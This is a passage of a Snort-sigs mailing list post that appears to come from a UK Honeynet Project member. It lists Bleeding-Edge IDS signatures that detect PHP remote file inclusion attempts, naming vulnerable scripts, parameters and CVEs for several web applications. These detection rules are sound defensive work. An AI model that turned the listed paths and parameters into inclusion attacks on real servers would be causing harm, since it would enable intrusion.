reference:url,www.securityfocus.com/bid/23662; sid:2003687; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TurnKeyWebTools Remote Inclusion Attempt --
global.php abs_path"; flow:established,to_server;
uricontent:"/global.php?"; nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2474;
reference:url,www.securityfocus.com/bid/23662; sid:2003688; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TurnKeyWebTools Remote Inclusion Attempt --
libsecure.php abs_path"; flow:established,to_server;
uricontent:"/libsecure.php?"; nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2474;
reference:url,www.securityfocus.com/bid/23662; sid:2003689; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB VM Watermark Remote Inclusion Attempt --
watermark.php GALLERY_BASEDIR"; flow:established,to_server;
uricontent:"/watermark.php?"; nocase; uricontent:"GALLERY_BASEDIR=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2575;
reference:url,www.milw0rm.com/exploits/3857; sid:2003692; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP VWar Remote File Inclusion
get_header.php"; flow:established,to_server;
uricontent:"/get_header.php"; nocase;
pcre:"/vwar_root=\s*(ftps?|php|https?)\:\//Ui";
reference:url,www.milw0rm.com/exploits/1632; reference:cve,2006-1636;
reference:bugtraq,17358; classtype:web-application-attack;
sid:2002899; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP VWar Remote File Inclusion
functions_install.php"; flow:established,to_server;
uricontent:"/functions_install.php"; nocase;
pcre:"/vwar_root=\s*(ftps?|php|https?)\:\//Ui";
reference:cve,2006-1503; reference:bugtraq,17290;
classtype:web-application-attack; sid:2002902; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Versado CMS Remote Inclusion Attempt --
ajax_listado.php urlModulo"; flow:established,to_server;
uricontent:"/includes/ajax_listado.php?"; nocase;
uricontent:"urlModulo="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2541;
reference:url,www.milw0rm.com/exploits/3847; sid:2003671; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Wikivi5 Remote Inclusion Attempt -- show.php
sous_rep"; flow:established,to_server;
uricontent:"/handlers/page/show.php?"; nocase; uricontent:"sous_rep=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2570;
reference:url,www.milw0rm.com/exploits/3863; sid:2003696; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Wordpress Remote Inclusion Attempt --
wptable-button.php wpPATH"; flow:established,to_server;
uricontent:"/js/wptable-button.php?"; nocase; uricontent:"wpPATH=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2484;
reference:url,www.milw0rm.com/exploits/3824; sid:2003685; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Wordpress Remote Inclusion Attempt --
wordtube-button.php wpPATH"; flow:established,to_server;
uricontent:"/wordtube-button.php?"; nocase; uricontent:"wpPATH=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2481;
reference:url,www.milw0rm.com/exploits/3825; sid:2003686; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB iPhotoAlbum header.php remote file include";
flow:established,to_server; uricontent:"/header.php?"; nocase;
pcre:"/set_menu=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,23189; classtype:web-application-attack;
sid:2003517; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Yaap Remote Inclusion Attempt -- common.php
root_path"; flow:established,to_server;
uricontent:"/includes/common.php?"; nocase; uricontent:"root_path=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2664;
reference:url,www.milw0rm.com/exploits/3908; sid:2003739; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- lom.php
ETCDIR"; flow:established,to_server; uricontent:"/libs/lom.php?";
nocase; uricontent:"ETCDIR="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003718; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt --
lom_update.php ETCDIR"; flow:established,to_server;
uricontent:"/lom_update.php?"; nocase; uricontent:"ETCDIR="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003719; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt --
check-lom.php ETCDIR"; flow:established,to_server;
uricontent:"/scripts/check-lom.php?"; nocase; uricontent:"ETCDIR=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003720; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt --
weigh_keywords.php ETCDIR"; flow:established,to_server;
uricontent:"/scripts/weigh_keywords.php?"; nocase;
uricontent:"ETCDIR="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003721; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- logout.php
ETCDIR"; flow:established,to_server; uricontent:"/logout.php?";
nocase; uricontent:"ETCDIR="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003722; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- help.php
ETCDIR"; flow:established,to_server; uricontent:"/help.php?"; nocase;
uricontent:"ETCDIR="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003723; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- index.php
ETCDIR"; flow:established,to_server; uricontent:"/index.php?"; nocase;
uricontent:"ETCDIR="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003724; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- login.php
ETCDIR"; flow:established,to_server; uricontent:"/login.php?"; nocase;
uricontent:"ETCDIR="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003725; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB gnuedu Remote Inclusion Attempt -- lom.php
ETCDIR"; flow:established,to_server; uricontent:"/web/lom.php?";
nocase; uricontent:"ETCDIR="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2609;
reference:url,www.milw0rm.com/exploits/3876; sid:2003747; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB MXBB Remote Inclusion Attempt -- faq.php
module_root_path"; flow:established,to_server; uricontent:"/faq.php?";
nocase; uricontent:"module_root_path="; nocase; uricontent:"cmd=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2493;
reference:url,www.milw0rm.com/exploits/3833; sid:2003684; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion index.php abs_path";
flow:established,to_server; uricontent:"/index.php?"; nocase;
uricontent:"abs_path="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2559;
reference:url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded;
sid:2003698; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion checkout.php
abs_path"; flow:established,to_server; uricontent:"/checkout.php?";
nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2559;
reference:url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded;
sid:2003699; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion libsecure.php
abs_path"; flow:established,to_server; uricontent:"/libsecure.php?";
nocase; uricontent:"abs_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2559;
reference:url,www.securityfocus.com/archive/1/archive/1/467840/100/0/threaded;
sid:2003700; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB pfa CMS Remote Inclusion index.php repinc";
flow:established,to_server; uricontent:"/index.php?"; nocase;
uricontent:"repinc="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2558;
reference:url,www.securityfocus.com/archive/1/archive/1/467827/100/0/threaded;
sid:2003701; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Workbench Survival Guide Remote Inclusion
Attempt -- headerfile.php path"; flow:established,to_server;
uricontent:"/header.php?"; nocase; uricontent:"path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2542;
reference:url,www.milw0rm.com/exploits/3848; sid:2003670; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Remote File Inclusion (monster list php)";
flow:established,to_server; uricontent:".php"; nocase;
uricontent:"php"; nocase;
pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery|domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf|id|df|[a-z](\[.*\])+)\s*=\s*php?/Ui";
reference:url,www.sans.org/top20/; classtype:web-application-attack;
sid:xx; rev:1; )

--
Jamie Riden, CISSP / jamesr at ...3216... / jamie at ...3294...
UK Honeynet Project: http://www.ukhoneynet.org/


-- 
Jamie Riden, CISSP / jamesr at ...3216... / jamie at ...3294...
UK Honeynet Project: http://www.ukhoneynet.org/




More information about the Snort-sigs mailing list